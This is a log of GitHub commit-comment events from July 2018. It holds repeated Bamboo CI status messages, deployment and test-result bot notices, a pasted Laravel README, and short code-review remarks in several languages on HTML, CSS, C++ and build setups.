{"id":"7908276412","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570523,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-02T18:34:41Z","updated_at":"2018-07-02T18:34:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:34:41Z"}
{"id":"7908277372","type":"CommitCommentEvent","actor":{"login":"Angelszm"},"repo":{"name":"Angelszm/GoogleMap"},"payload":{"comment":{"id":29570528,"position":null,"line":null,"path":null,"commit_id":"d2584e9549c5a3aef70a341ffc8191e9697b812e","created_at":"2018-07-02T18:34:51Z","updated_at":"2018-07-02T18:34:51Z","author_association":"OWNER","body":"\r\nBuild Status Total Downloads Latest Stable Version License\r\n\r\nAbout Laravel\r\nLaravel is a web application framework with expressive, elegant syntax. We believe development must be an enjoyable and creative experience to be truly fulfilling. Laravel attempts to take the pain out of development by easing common tasks used in the majority of web projects, such as:\r\n\r\nSimple, fast routing engine.\r\nPowerful dependency injection container.\r\nMultiple back-ends for session and cache storage.\r\nExpressive, intuitive database ORM.\r\nDatabase agnostic schema migrations.\r\nRobust background job processing.\r\nReal-time event broadcasting.\r\nLaravel is accessible, yet powerful, providing tools needed for large, robust applications.\r\n\r\nLearning Laravel\r\nLaravel has the most extensive and thorough documentation and video tutorial library of any modern web application framework, making it a breeze to get started learning the framework.\r\n\r\nIf you're not in the mood to read, Laracasts contains over 1100 video tutorials on a range of topics including Laravel, modern PHP, unit testing, JavaScript, and more. Boost the skill level of yourself and your entire team by digging into our comprehensive video library.\r\n\r\nLaravel Sponsors\r\nWe would like to extend our thanks to the following sponsors for helping fund on-going Laravel development. If you are interested in becoming a sponsor, please visit the Laravel Patreon page:\r\n\r\nVehikl\r\nTighten Co.\r\nKirschbaum Development Group\r\nCubet Techno Labs\r\nBritish Software Development\r\nFragrantica\r\nSOFTonSOFA\r\nUser10\r\nSoumettre.fr\r\nCodeBrisk\r\n1Forge\r\nTECPRESSO\r\nRuntime Converter\r\nWebL'Agence\r\nInvoice Ninja\r\nContributing\r\nThank you for considering contributing to the Laravel framework! The contribution guide can be found in the Laravel documentation.\r\n\r\nSecurity Vulnerabilities\r\nIf you discover a security vulnerability within Laravel, please send an e-mail to Taylor Otwell via taylor@laravel.com. All security vulnerabilities will be promptly addressed."}},"created_at":"2018-07-02T18:34:51Z"}
{"id":"7908281113","type":"CommitCommentEvent","actor":{"login":"deletescape"},"repo":{"name":"BenzoRom/frameworks_base"},"payload":{"comment":{"id":29570538,"position":null,"line":null,"path":null,"commit_id":"96ad58b34eb7d1e50fce74e55d8f3ab306953c94","created_at":"2018-07-02T18:35:36Z","updated_at":"2018-07-02T18:35:36Z","author_association":"CONTRIBUTOR","body":"This commit currently has a bug where the first indication to be set after it has been invisible will never actually be set. I'm currently working on an updated patchset for aosp and just wanted to let you know. "}},"created_at":"2018-07-02T18:35:36Z"}
{"id":"7908282485","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570540,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-02T18:35:53Z","updated_at":"2018-07-02T18:35:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:35:53Z"}
{"id":"7908282796","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570541,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-02T18:35:57Z","updated_at":"2018-07-02T18:35:57Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-02T18:35:57Z"}
{"id":"7908283032","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570543,"position":69,"line":78,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:35:59Z","updated_at":"2018-07-02T18:35:59Z","author_association":"COLLABORATOR","body":"сделал"}},"created_at":"2018-07-02T18:35:59Z"}
{"id":"7908284959","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570545,"position":18,"line":18,"path":"index.html","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:36:25Z","updated_at":"2018-07-02T18:36:25Z","author_association":"NONE","body":"Algum motivo pra esse css inline no img?"}},"created_at":"2018-07-02T18:36:25Z"}
{"id":"7908287084","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29570547,"position":null,"line":null,"path":null,"commit_id":"ca893c46b08bd4c72e2f0880eebf599076d80b6c","created_at":"2018-07-02T18:36:52Z","updated_at":"2018-07-02T18:36:52Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-216](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-216).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-216-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-02T18:36:52Z"}
{"id":"7908288026","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570549,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-02T18:37:05Z","updated_at":"2018-07-02T18:37:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:37:05Z"}
{"id":"7908290283","type":"CommitCommentEvent","actor":{"login":"gepd"},"repo":{"name":"gepd/Deviot"},"payload":{"comment":{"id":29570553,"position":null,"line":null,"path":null,"commit_id":"657a6dc7945571c0dea36433a9b95bfa4b88c383","created_at":"2018-07-02T18:37:34Z","updated_at":"2018-07-02T18:37:34Z","author_association":"OWNER","body":"Yes I was trying to replicate it and I couldn't, let me know if you see it again"}},"created_at":"2018-07-02T18:37:34Z"}
{"id":"7908291221","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570556,"position":29,"line":29,"path":"index.html","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:37:46Z","updated_at":"2018-07-02T18:37:46Z","author_association":"NONE","body":"Adicionar manipuladores de eventos js direto no html é uma má prática. Coloca o bind disso dentro de um js =)"}},"created_at":"2018-07-02T18:37:46Z"}
{"id":"7908291978","type":"CommitCommentEvent","actor":{"login":"leanguardia"},"repo":{"name":"TEDxUCBCBA/TedXWebPage"},"payload":{"comment":{"id":29570557,"position":4,"line":15,"path":"public/styles/bulma-override.css","commit_id":"638a7db9ea546cac8271d36cff82840ffba7521b","created_at":"2018-07-02T18:37:56Z","updated_at":"2018-07-02T18:37:56Z","author_association":"CONTRIBUTOR","body":"@whiletruedothis \r\nRodri, te parece si hacemos que sólo los bordes inferiores estén redondeados??\r\nPienso que tener los superiores cuadrados se vería mejor "}},"created_at":"2018-07-02T18:37:56Z"}
{"id":"7908293413","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570559,"position":35,"line":35,"path":"index.html","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:38:15Z","updated_at":"2018-07-02T18:38:15Z","author_association":"NONE","body":"mesma treta de adicionar o evento direto no html."}},"created_at":"2018-07-02T18:38:15Z"}
{"id":"7908293618","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570563,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-02T18:38:17Z","updated_at":"2018-07-02T18:38:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:38:17Z"}
{"id":"7908293677","type":"CommitCommentEvent","actor":{"login":"garybernhardt"},"repo":{"name":"garybernhardt/dotfiles"},"payload":{"comment":{"id":29570564,"position":null,"line":null,"path":null,"commit_id":"11faee2da1c529745e2aa4f082cecd5225b2cca8","created_at":"2018-07-02T18:38:18Z","updated_at":"2018-07-02T18:38:18Z","author_association":"OWNER","body":"I just switched to that method in c924af8. Thanks!"}},"created_at":"2018-07-02T18:38:18Z"}
{"id":"7908295137","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29570566,"position":null,"line":null,"path":null,"commit_id":"a32f9c7ad280779d1e69532bbdc8bed19b975a8f","created_at":"2018-07-02T18:38:37Z","updated_at":"2018-07-02T18:38:37Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#ci-3](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#ci-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-3-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-02T18:38:37Z"}
{"id":"7908295778","type":"CommitCommentEvent","actor":{"login":"leanguardia"},"repo":{"name":"TEDxUCBCBA/TedXWebPage"},"payload":{"comment":{"id":29570569,"position":11,"line":103,"path":"public/index.html","commit_id":"3d4f65f81d6703cf54bf4a17b15cde1bc23bd699","created_at":"2018-07-02T18:38:46Z","updated_at":"2018-07-02T18:38:46Z","author_association":"CONTRIBUTOR","body":"😢 \r\nmentira ahahahah"}},"created_at":"2018-07-02T18:38:46Z"}
{"id":"7908297295","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570573,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-02T18:39:05Z","updated_at":"2018-07-02T18:39:05Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-02T18:39:05Z"}
{"id":"7908298621","type":"CommitCommentEvent","actor":{"login":"kevinkreiser"},"repo":{"name":"valhalla/valhalla"},"payload":{"comment":{"id":29570575,"position":8,"line":543,"path":"valhalla/midgard/sequence.h","commit_id":"43a65233ca00e8eebc434e9481ed823c274b8609","created_at":"2018-07-02T18:39:22Z","updated_at":"2018-07-02T18:39:22Z","author_association":"MEMBER","body":"this signals the caller that no file is mapped at all (differentiates between empty tar and no tar)"}},"created_at":"2018-07-02T18:39:22Z"}
{"id":"7908299073","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570576,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-02T18:39:28Z","updated_at":"2018-07-02T18:39:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:39:28Z"}
{"id":"7908300582","type":"CommitCommentEvent","actor":{"login":"esoergel"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29570583,"position":null,"line":null,"path":null,"commit_id":"e7e684ab8b45f48d704c4e9032a6f880f2f880aa","created_at":"2018-07-02T18:39:49Z","updated_at":"2018-07-02T18:39:49Z","author_association":"CONTRIBUTOR","body":"This change is twofold:\r\n\r\nIt's difficult to assign a parent location at the time when the location stub is being created.  You'd need to either reorder locations to be top-to-bottom first (which is hard, since they're not yet fully parsed), or do two passes, one to init everything, then a second to add parents.  I didn't like the second option since you'd have to mutate the location after its construction.  Luckily, it looked like very little actually requires the parent object - pretty much just at the point of saving, so I opted to move the lookup there and drop the linkage.\r\n\r\nThe second aspect of this is that I realized we should be looking for the old ancestors here anyways, since they're the ones that are affected by a deletion."}},"created_at":"2018-07-02T18:39:49Z"}
{"id":"7908304471","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570587,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-02T18:40:39Z","updated_at":"2018-07-02T18:40:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:40:39Z"}
{"id":"7908304592","type":"CommitCommentEvent","actor":{"login":"kevinkreiser"},"repo":{"name":"valhalla/valhalla"},"payload":{"comment":{"id":29570588,"position":21,"line":33,"path":"src/baldr/graphreader.cc","commit_id":"43a65233ca00e8eebc434e9481ed823c274b8609","created_at":"2018-07-02T18:40:41Z","updated_at":"2018-07-02T18:40:41Z","author_association":"MEMBER","body":"fixed this in the next commit"}},"created_at":"2018-07-02T18:40:41Z"}
{"id":"7908306122","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570593,"position":40,"line":40,"path":"index.html","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:41:01Z","updated_at":"2018-07-02T18:41:01Z","author_association":"NONE","body":"Esse id é usado como refetencia no js? Se sim, existe uma forma melhor de fazer isso usando um atributo `data-js` e acessá-lo por esse atributo com `document.querySelector('[data-js=\"todo-container\"]')`"}},"created_at":"2018-07-02T18:41:01Z"}
{"id":"7908307372","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"leahgwin/ch9jquery"},"payload":{"comment":{"id":29570596,"position":null,"line":null,"path":null,"commit_id":"d537e2586af67d56da9da004421ac622563c15ec","created_at":"2018-07-02T18:41:17Z","updated_at":"2018-07-02T18:41:17Z","author_association":"NONE","body":"Check your index.html, because when I run it from dist, it only should need the bundle, not the other js files. Remember, you're running the server in `dist`, which means all the folders that get copied need to have the correct relative path from being in dist together.\r\nIf none of that makes sense, come see me later on and I'll show you!"}},"created_at":"2018-07-02T18:41:17Z"}
{"id":"7908308906","type":"CommitCommentEvent","actor":{"login":"OXINARF"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":29570600,"position":null,"line":null,"path":null,"commit_id":"dc15cbd5139f3069f2a5583e7800044b0990f381","created_at":"2018-07-02T18:41:37Z","updated_at":"2018-07-02T18:41:37Z","author_association":"MEMBER","body":"@AndKe It would setup (and save) the configuration on every boot - even when it was already setup as wanted."}},"created_at":"2018-07-02T18:41:37Z"}
{"id":"7908309111","type":"CommitCommentEvent","actor":{"login":"takerum"},"repo":{"name":"qinenergy/vat_tf"},"payload":{"comment":{"id":29570601,"position":null,"line":null,"path":null,"commit_id":"1cf53827400970dc607e09cd2a945d4acfcf07e6","created_at":"2018-07-02T18:41:39Z","updated_at":"2018-07-02T18:41:39Z","author_association":"NONE","body":"Thanks so much for fixing the bug. Could you change each arg of `--log_dir` to <path_to_log_dir> ?"}},"created_at":"2018-07-02T18:41:39Z"}
{"id":"7908309758","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29570603,"position":112,"line":84,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T18:41:48Z","updated_at":"2018-07-02T18:41:48Z","author_association":"COLLABORATOR","body":"А вот здесь я бы не стал это делать. Помните, я вас спрашивал как-то про конфигурационные (аппаратная конфигурация) и динамические (режим использования) параметры. В этом случае это как раз режим использования, который, возможно, захочется поменять во время работы программы. для этого нужно будет\r\nmco.stop();\r\nmco.start(новая частота);"}},"created_at":"2018-07-02T18:41:48Z"}
{"id":"7908309829","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570604,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-02T18:41:49Z","updated_at":"2018-07-02T18:41:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:41:49Z"}
{"id":"7908310786","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570608,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-02T18:42:03Z","updated_at":"2018-07-02T18:42:03Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-02T18:42:03Z"}
{"id":"7908313291","type":"CommitCommentEvent","actor":{"login":"barbudreadmon"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29570616,"position":null,"line":null,"path":null,"commit_id":"55b25a4208c453bb5b28cdce634d464c25fb646f","created_at":"2018-07-02T18:42:36Z","updated_at":"2018-07-02T18:42:36Z","author_association":"NONE","body":"I confirm 2P works in the games you mention, i should have expected this since this is an arcade system : controls are probably wired differently for the games i mention... I'm pretty sure the issue with analogs is kinda related too (analog controls seems to be wired to other buses in mame's naomi driver). Is there some kind of game identifier available when `mcfg_CreateDevices` is called ? It feels extremely likely we'll need different `mcfg_Create` calls depending on the game."}},"created_at":"2018-07-02T18:42:36Z"}
{"id":"7908313592","type":"CommitCommentEvent","actor":{"login":"cryptomagz"},"repo":{"name":"cryptomagz/token-profile"},"payload":{"comment":{"id":29570617,"position":null,"line":null,"path":null,"commit_id":"a54f2443f65b7751676375e82827ab7869cfa337","created_at":"2018-07-02T18:42:40Z","updated_at":"2018-07-02T18:42:40Z","author_association":"OWNER","body":"Please Accept my Request for add CMZ Token, thank"}},"created_at":"2018-07-02T18:42:40Z"}
{"id":"7908314999","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29570619,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-02T18:42:59Z","updated_at":"2018-07-02T18:42:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T18:42:59Z"}
{"id":"7908315881","type":"CommitCommentEvent","actor":{"login":"guilhermependezza"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29570623,"position":1,"line":1,"path":"src/css/style.css","commit_id":"340e313ecfe69a7c952cede3aaf406ee33f0f922","created_at":"2018-07-02T18:43:11Z","updated_at":"2018-07-02T18:43:11Z","author_association":"NONE","body":"Prefira sempre usar classes para estilzar seus elementos. A performance do CSS é melhor e não corre o risco do seu CSS vazar para elementos (`h1` nesse caso) indesejados."}},"created_at":"2018-07-02T18:43:11Z"}
{"id":"7908315960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29570624,"position":null,"line":null,"path":null,"commit_id":"57d18d847e8c6fca974107dfc6e2da7d2528a3b2","created_at":"2018-07-02T18:43:12Z","updated_at":"2018-07-02T18:43:12Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2841 of 2965 tests passed, 42 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 92 tests had: EIO diffs.\n * 109 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 89 tests had: MTR small diffs.\n * 151 tests had: RDD diffs.\n * 123 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 7 tests had: ERR diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 519\n * Failed: 124\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57d18d847e8c6fca974107dfc6e2da7d2528a3b2-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.82%25-yellow.png)</a> \n"}},"created_at":"2018-07-02T18:43:12Z"}
{"id":"7908316404","type":"CommitCommentEvent","actor":{"login":"hoblin"},"repo":{"name":"hybridgroup/artoo"},"payload":{"comment":{"id":29570627,"position":21,"line":89,"path":"lib/artoo/adaptors/io/digital_pin.rb","commit_id":"34f5a8fb975d78addd9b184f3d01e996b71f004e","created_at":"2018-07-02T18:43:17Z","updated_at":"2018-07-02T18:43:17Z","author_association":"NONE","body":"@rpurdon `#close` is instance method. Not class method. "}},"created_at":"2018-07-02T18:43:17Z"}
